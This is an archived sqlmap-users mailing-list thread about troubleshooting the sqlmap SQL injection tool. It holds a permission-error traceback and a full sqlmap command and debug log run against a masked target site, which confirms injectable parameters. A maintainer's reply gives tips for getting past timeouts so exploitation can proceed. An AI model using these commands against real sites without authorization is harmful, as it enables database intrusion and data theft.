Hi. Plz update to the latest development 0.9/dev version as you use pretty old and outdated version right now (0.6.4): svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Kind regards. p.s. have you tried something like: sudo chmod 666 /home/flow/.sqlmap/output/bankcomm.163.com/log to solve your problem? On Thu, Dec 2, 2010 at 5:37 PM, new age <lit...@qq...> wrote: > sqlmap version: 0.6.4 > Python version: 2.6.6 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 81, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 254, in start > createTargetDirs() > File "/usr/share/sqlmap/lib/core/target.py", line 234, in createTargetDirs > dumper.setOutputFile() > File "/usr/share/sqlmap/lib/core/dump.py", line 71, in setOutputFile > self.__outputFP = open(self.__outputFile, "a") > IOError: [Errno 13] Permission denied: > '/home/flow/.sqlmap/output/bankcomm.163.com/log' > > ------------------------------------------------------------------------------ > Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! > Tap into the largest installed PC base & get more eyes on your game by > optimizing for Intel(R) Graphics Technology. Get started today with the > Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. > http://p.sf.net/sfu/intelisp-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: n. a. <lit...@qq...> - 2010-12-02 16:37:29
|
sqlmap version: 0.6.4
Python version: 2.6.6
Operating system: linux2
Traceback (most recent call last):
File "/usr/bin/sqlmap", line 81, in main
start()
File "/usr/share/sqlmap/lib/controller/controller.py", line 254, in start
createTargetDirs()
File "/usr/share/sqlmap/lib/core/target.py", line 234, in createTargetDirs
dumper.setOutputFile()
File "/usr/share/sqlmap/lib/core/dump.py", line 71, in setOutputFile
self.__outputFP = open(self.__outputFile, "a")
IOError: [Errno 13] Permission denied: '/home/flow/.sqlmap/output/bankcomm.163.com/log' |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-02 15:55:58
|
You can either remove tests from x/payloads.XML or I would suggest to set --timeout to an appropriate value, maybe 60 or 120 will do in your case. Bernardo Damele A. G. This message was sent from a smartphone On 1 Dec 2010, at 19:36, David Guimaraes <sk...@gm...> wrote: Is there any way to make sqlmap not conduct further tests on the site? (stacked, error, time-based, etc.). The problem is that during the identification of types of sqli allowed, it hangs on a test and terminates the program without allowing me to exploit the flaw. Example: Revision: 2468 $ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p vulnparam --threads 20 --dbs -v 2 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 17:23:43 [17:23:43] [DEBUG] cleaning up configuration parameters [17:23:43] [DEBUG] setting the HTTP timeout [17:23:43] [DEBUG] setting the HTTP method to GET [17:23:43] [DEBUG] setting the UNION query SQL injection range of columns [17:23:43] [DEBUG] creating HTTP requests opener object [17:23:43] [INFO] using '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file [17:23:43] [INFO] testing connection to the target url [17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not into the Cookie [17:23:44] [INFO] testing if the url is stable, wait a few seconds [17:23:46] [INFO] url is stable [17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be injectable (possible DBMS: MySQL) [17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam' [17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause' sqlmap got a 302 redirect to /home/l.php - What target address do you want to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or provide another target address based also on the redirection got from the application > [17:23:52] [DEBUG] setting match ratio for current parameter to default value 0.900 [17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - WHERE clause' injectable [17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' because the risk is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause' [17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - WHERE clause' injectable [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries' [17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists function' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:26:13] [CRITICAL] unable to connect to the target url or proxy [*] shutting down at: 17:26:13 David ------------------------------------------------------------------------------ Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! Tap into the largest installed PC base & get more eyes on your game by optimizing for Intel(R) Graphics Technology. Get started today with the Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. http://p.sf.net/sfu/intelisp-dev2dev _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
48 messages has been excluded from this view by a project administrator.
